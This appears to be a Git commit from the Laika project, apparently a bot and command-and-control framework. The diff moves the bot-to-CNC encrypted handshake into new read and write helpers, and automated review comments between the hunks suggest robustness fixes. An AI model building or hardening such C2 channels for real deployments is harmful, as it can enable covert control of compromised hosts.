mirror of https://github.com/CPunch/Laika.git synced 2024-11-24 13:31:05 +00:00

Added laikaS_readENC laikaS_writeENC, minor refactoring

CPunch 2022-01-29 00:26:15 -06:00
parent 8627f5b85d
commit 56c6db1d62
8 changed files with 43 additions and 24 deletions


@ -4,7 +4,7 @@
#include "bot.h" #include "bot.h"
LAIKAPKT_SIZE laikaB_pktSizeTbl[LAIKAPKT_MAXNONE] = { LAIKAPKT_SIZE laikaB_pktSizeTbl[LAIKAPKT_MAXNONE] = {
[LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t) + crypto_box_SEALBYTES + LAIKA_NONCESIZE [LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t) + LAIKAENC_SIZE(LAIKA_NONCESIZE)
}; };
void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) { void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
@ -12,12 +12,12 @@ void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
switch (id) { switch (id) {
case LAIKAPKT_HANDSHAKE_RES: { case LAIKAPKT_HANDSHAKE_RES: {
uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE], nonce[LAIKA_NONCESIZE]; uint8_t encNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)], nonce[LAIKA_NONCESIZE];
uint8_t endianness = laikaS_readByte(&peer->sock); uint8_t endianness = laikaS_readByte(&peer->sock);
/* read & decrypt nonce */ /* read & decrypt nonce */
laikaS_read(&peer->sock, encNonce, sizeof(encNonce)); laikaS_read(&peer->sock, encNonce, sizeof(encNonce));
if (crypto_box_seal_open(nonce, encNonce, crypto_box_SEALBYTES + LAIKA_NONCESIZE, bot->pub, bot->priv) != 0) if (crypto_box_seal_open(nonce, encNonce, LAIKAENC_SIZE(LAIKA_NONCESIZE), bot->pub, bot->priv) != 0)
LAIKA_ERROR("Failed to decrypt nonce!\n"); LAIKA_ERROR("Failed to decrypt nonce!\n");
/* check nonce */ /* check nonce */
@ -57,6 +57,7 @@ struct sLaika_bot *laikaB_newBot(void) {
LAIKA_ERROR("Failed to gen keypair!\n"); LAIKA_ERROR("Failed to gen keypair!\n");
} }
/* read cnc's public key into peerPub */
if (sodium_hex2bin(bot->peer->peerPub, crypto_box_PUBLICKEYBYTES, LAIKA_PUBKEY, strlen(LAIKA_PUBKEY), NULL, &_unused, NULL) != 0) { if (sodium_hex2bin(bot->peer->peerPub, crypto_box_PUBLICKEYBYTES, LAIKA_PUBKEY, strlen(LAIKA_PUBKEY), NULL, &_unused, NULL) != 0) {
laikaB_freeBot(bot); laikaB_freeBot(bot);
LAIKA_ERROR("Failed to init cnc public key!\n"); LAIKA_ERROR("Failed to init cnc public key!\n");
@ -74,7 +75,6 @@ void laikaB_freeBot(struct sLaika_bot *bot) {
} }
void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) { void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {
uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE];
struct sLaika_socket *sock = &bot->peer->sock; struct sLaika_socket *sock = &bot->peer->sock;
/* setup socket */ /* setup socket */
@ -83,16 +83,12 @@ void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {
laikaP_addSock(&bot->pList, sock); laikaP_addSock(&bot->pList, sock);
/* encrypt nonce using cnc's pubkey */
if (crypto_box_seal(encNonce, bot->nonce, sizeof(bot->nonce), bot->peer->peerPub) != 0)
LAIKA_ERROR("Failed to enc nonce!\n");
/* queue handshake request */ /* queue handshake request */
laikaS_writeByte(sock, LAIKAPKT_HANDSHAKE_REQ); laikaS_writeByte(sock, LAIKAPKT_HANDSHAKE_REQ);
laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN); laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN);
laikaS_writeByte(sock, LAIKA_VERSION_MAJOR); laikaS_writeByte(sock, LAIKA_VERSION_MAJOR);
laikaS_writeByte(sock, LAIKA_VERSION_MINOR); laikaS_writeByte(sock, LAIKA_VERSION_MINOR);
laikaS_write(sock, encNonce, sizeof(encNonce)); /* write encrypted nonce test */ laikaS_writeENC(sock, bot->nonce, LAIKA_NONCESIZE, bot->peer->peerPub); /* write encrypted nonce test */
laikaS_write(sock, bot->pub, sizeof(bot->pub)); /* write public key */ laikaS_write(sock, bot->pub, sizeof(bot->pub)); /* write public key */
if (!laikaS_handlePeerOut(bot->peer)) if (!laikaS_handlePeerOut(bot->peer))
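Review bot: The LAIKAPKT_HANDSHAKE_RES handler still reads into a local `encNonce` and calls crypto_box_seal_open by hand, while the matching path in the cnc handler was moved to the new helper in this same commit. For consistency the `laikaS_read` / `crypto_box_seal_open` pair could become `laikaS_readENC(&peer->sock, nonce, LAIKA_NONCESIZE, bot->pub, bot->priv);`, and the `encNonce` array could be dropped. That would change the failure message from "Failed to decrypt nonce!" to the helper's generic "Failed to decrypt!", so keep the manual form if the specific message matters. The handler body continues outside the hunk, so the nonce comparison after the decrypt is not visible here.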


@ -12,11 +12,11 @@ int main(int argv, char **argc) {
/* while connection is still alive, poll bot */ /* while connection is still alive, poll bot */
while (laikaS_isAlive((&bot->peer->sock))) { while (laikaS_isAlive((&bot->peer->sock))) {
if (!laikaB_poll(bot, 1000)) { if (!laikaB_poll(bot, 1000)) {
printf("no events!\n"); LAIKA_DEBUG("no events!\n");
} }
} }
laikaB_freeBot(bot); laikaB_freeBot(bot);
printf("bot killed\n"); LAIKA_DEBUG("bot killed\n");
return 0; return 0;
} }


@ -6,7 +6,7 @@
#include "cnc.h" #include "cnc.h"
LAIKAPKT_SIZE laikaC_pktSizeTbl[LAIKAPKT_MAXNONE] = { LAIKAPKT_SIZE laikaC_pktSizeTbl[LAIKAPKT_MAXNONE] = {
[LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + crypto_box_SEALBYTES + LAIKA_NONCESIZE + crypto_box_PUBLICKEYBYTES [LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + LAIKAENC_SIZE(LAIKA_NONCESIZE) + crypto_box_PUBLICKEYBYTES
}; };
void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) { void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
@ -15,7 +15,7 @@ void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
switch (id) { switch (id) {
case LAIKAPKT_HANDSHAKE_REQ: { case LAIKAPKT_HANDSHAKE_REQ: {
char magicBuf[LAIKA_MAGICLEN]; char magicBuf[LAIKA_MAGICLEN];
uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE], nonce[LAIKA_NONCESIZE]; uint8_t nonce[LAIKA_NONCESIZE];
uint8_t major, minor; uint8_t major, minor;
laikaS_read(&peer->sock, (void*)magicBuf, LAIKA_MAGICLEN); laikaS_read(&peer->sock, (void*)magicBuf, LAIKA_MAGICLEN);
@ -28,21 +28,15 @@ void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
LAIKA_ERROR("invalid handshake request!\n"); LAIKA_ERROR("invalid handshake request!\n");
/* read & decrypt nonce */ /* read & decrypt nonce */
laikaS_read(&peer->sock, encNonce, sizeof(encNonce)); laikaS_readENC(&peer->sock, nonce, LAIKA_NONCESIZE, cnc->pub, cnc->priv);
if (crypto_box_seal_open(nonce, encNonce, sizeof(encNonce), cnc->pub, cnc->priv) != 0)
LAIKA_ERROR("Failed to decrypt nonce!\n");
/* read peer's public key */ /* read peer's public key */
laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub)); laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub));
/* encrypt decrypted nonce with peer's pub key */
if (crypto_box_seal(encNonce, nonce, sizeof(nonce), peer->peerPub) != 0)
LAIKA_ERROR("Failed to enc nonce!\n");
/* queue response */ /* queue response */
laikaS_writeByte(&peer->sock, LAIKAPKT_HANDSHAKE_RES); laikaS_writeByte(&peer->sock, LAIKAPKT_HANDSHAKE_RES);
laikaS_writeByte(&peer->sock, laikaS_isBigEndian()); laikaS_writeByte(&peer->sock, laikaS_isBigEndian());
laikaS_write(&peer->sock, encNonce, sizeof(encNonce)); laikaS_writeENC(&peer->sock, nonce, LAIKA_NONCESIZE, peer->peerPub); /* encrypt nonce with peer's public key */
LAIKA_DEBUG("accepted handshake from peer %x\n", peer); LAIKA_DEBUG("accepted handshake from peer %x\n", peer);
break; break;
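Review bot: The unchanged debug line at the end of the LAIKAPKT_HANDSHAKE_REQ case passes a `struct sLaika_peer *` to a `%x` conversion. If LAIKA_DEBUG forwards to a printf-style formatter (the printf-to-LAIKA_DEBUG replacement in this commit suggests it does), that is a format/argument mismatch and truncates the pointer on 64-bit targets. It should read `LAIKA_DEBUG("accepted handshake from peer %p\n", (void*)peer);`. The case body starts outside the hunk, so the magic and version checks before the decrypt are only partly visible.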


@ -14,15 +14,19 @@ enum {
* uint8_t laikaMagic[LAIKA_MAGICLEN]; * uint8_t laikaMagic[LAIKA_MAGICLEN];
* uint8_t majorVer; * uint8_t majorVer;
* uint8_t minorVer; * uint8_t minorVer;
* uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; -- encrypted using shared pubKey * uint8_t encNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)]; -- encrypted using shared pubKey
* uint8_t pubKey[crypto_box_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with * uint8_t pubKey[crypto_box_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with
*/ */
LAIKAPKT_HANDSHAKE_RES, LAIKAPKT_HANDSHAKE_RES,
/* layout of LAIKAPKT_HANDSHAKE_RES: /* layout of LAIKAPKT_HANDSHAKE_RES:
* uint8_t endian; * uint8_t endian;
* uint8_t reEncryptedNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; -- encrypted using received pubKey from LAIKAPKT_AUTH_REQ pkt * uint8_t reEncryptedNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)]; -- encrypted using received pubKey from LAIKAPKT_AUTH_REQ pkt
*/ */
LAIKAPKT_VARPKT_REQ, LAIKAPKT_VARPKT_REQ,
/* layout of LAIKAPKT_VARPKT_REQ:
* uint8_t pktID;
* uint16_t pktSize;
*/
LAIKAPKT_MAXNONE LAIKAPKT_MAXNONE
}; };
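Review bot: The layout comment for LAIKAPKT_HANDSHAKE_RES was edited here but still says the key came from a `LAIKAPKT_AUTH_REQ` pkt. No such packet ID appears anywhere in this commit; the packet that carries `pubKey` is handled as LAIKAPKT_HANDSHAKE_REQ, so the comment should read `-- encrypted using received pubKey from LAIKAPKT_HANDSHAKE_REQ pkt`. In the new LAIKAPKT_VARPKT_REQ layout, `uint16_t pktSize;` would be safer written as `LAIKAPKT_SIZE pktSize;`, because the receive path checks `sizeof(uint8_t) + sizeof(LAIKAPKT_SIZE)` and the typedef's width is not visible here. The enum starts outside the hunk.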


@ -3,4 +3,6 @@
#include "sodium.h" #include "sodium.h"
#define LAIKAENC_SIZE(sz) (sz + crypto_box_SEALBYTES)
#endif #endif
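Review bot: The new macro expands its argument without parentheses, so an argument containing a lower-precedence operator (for example a conditional expression) would be grouped wrongly with `+ crypto_box_SEALBYTES`. Write it as `#define LAIKAENC_SIZE(sz) ((sz) + crypto_box_SEALBYTES)`. Every call site in this commit passes a plain identifier, so nothing is broken today, but the macro is now used to size stack arrays and buffer offsets and should be robust.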


@ -86,6 +86,8 @@ bool laikaS_setNonBlock(struct sLaika_socket *sock);
void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz); /* reads from inBuf */ void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz); /* reads from inBuf */
void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz); /* writes to outBuf */ void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz); /* writes to outBuf */
void laikaS_writeENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub); /* encrypts & writes from buf */
void laikaS_readENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub, uint8_t *priv); /* decrypts & reads to buf */
void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data); void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data);
uint8_t laikaS_readByte(struct sLaika_socket *sock); uint8_t laikaS_readByte(struct sLaika_socket *sock);
void laikaS_readInt(struct sLaika_socket *sock, void *buf, size_t sz); /* reads INT, respecting endianness */ void laikaS_readInt(struct sLaika_socket *sock, void *buf, size_t sz); /* reads INT, respecting endianness */
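Review bot: The two new prototypes do not say that `sz` is the plaintext length, while the bytes moved through the socket buffers are `LAIKAENC_SIZE(sz)`. That is easy to get wrong, since the hand-written code these helpers replace passed the ciphertext size. The trailing comments could read `/* seals sz bytes from buf, appends LAIKAENC_SIZE(sz) bytes to outBuf */` and `/* consumes LAIKAENC_SIZE(sz) bytes from inBuf, writes sz decrypted bytes to buf */`. As a style point, `pub` and `priv` look like they could be `const uint8_t *`, since the libsodium calls they are passed to take const key pointers.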


@ -58,9 +58,10 @@ bool laikaS_handlePeerIn(struct sLaika_peer *peer) {
if (recvd != sizeof(uint8_t) + sizeof(LAIKAPKT_SIZE)) if (recvd != sizeof(uint8_t) + sizeof(LAIKAPKT_SIZE))
LAIKA_ERROR("couldn't read whole LAIKAPKT_VARPKT_REQ") LAIKA_ERROR("couldn't read whole LAIKAPKT_VARPKT_REQ")
/* read pktID */
peer->pktID = laikaS_readByte(&peer->sock); peer->pktID = laikaS_readByte(&peer->sock);
/* sanity check packet ID, (check valid range, check it's variadic) */ /* sanity check pktID, (check valid range, check it's variadic) */
if (peer->pktID >= LAIKAPKT_MAXNONE || peer->pktSizeTable[peer->pktID]) if (peer->pktID >= LAIKAPKT_MAXNONE || peer->pktSizeTable[peer->pktID])
LAIKA_ERROR("received evil pktID!\n") LAIKA_ERROR("received evil pktID!\n")


@ -3,6 +3,7 @@
#include "lerror.h" #include "lerror.h"
#include "lmem.h" #include "lmem.h"
#include "lpolllist.h" #include "lpolllist.h"
#include "lrsa.h"
#include "lsocket.h" #include "lsocket.h"
static int _LNSetup = 0; static int _LNSetup = 0;
@ -184,6 +185,25 @@ void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz) {
sock->outCount += sz; sock->outCount += sz;
} }
void laikaS_writeENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub) {
/* make sure we have enough space to encrypt the buffer */
laikaM_growarray(uint8_t, sock->outBuf, LAIKAENC_SIZE(sz), sock->outCount, sock->outCap);
/* encrypt the buffer into outBuf */
if (crypto_box_seal(&sock->outBuf[sock->outCount], buf, sz, pub) != 0)
LAIKA_ERROR("Failed to encrypt!");
sock->outCount += LAIKAENC_SIZE(sz);
}
void laikaS_readENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub, uint8_t *priv) {
/* decrypt into buf */
if (crypto_box_seal_open(buf, sock->inBuf, LAIKAENC_SIZE(sz), pub, priv) != 0)
LAIKA_ERROR("Failed to decrypt!");
laikaM_rmvarray(uint8_t, sock->inBuf, sock->inCount, 0, LAIKAENC_SIZE(sz));
}
void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data) { void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data) {
laikaM_growarray(uint8_t, sock->outBuf, 1, sock->outCount, sock->outCap); laikaM_growarray(uint8_t, sock->outBuf, 1, sock->outCount, sock->outCap);
sock->outBuf[sock->outCount++] = data; sock->outBuf[sock->outCount++] = data;
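Review bot: laikaS_readENC hands `sock->inBuf` to crypto_box_seal_open with length `LAIKAENC_SIZE(sz)` without checking that `sock->inCount` holds that many bytes, so a short input buffer would be read past its valid data. The callers in this commit run inside packet handlers, which presumably fire only once the size-table length has been buffered, but that guarantee is not visible here and the helper is exported in the header. Add a guard before the decrypt: `if (sock->inCount < LAIKAENC_SIZE(sz)) LAIKA_ERROR("Not enough data to decrypt!\n");`. The two new error strings also lack the trailing `\n` that most other LAIKA_ERROR messages in this commit carry. The laikaS_writeByte body after the new functions continues outside the hunk.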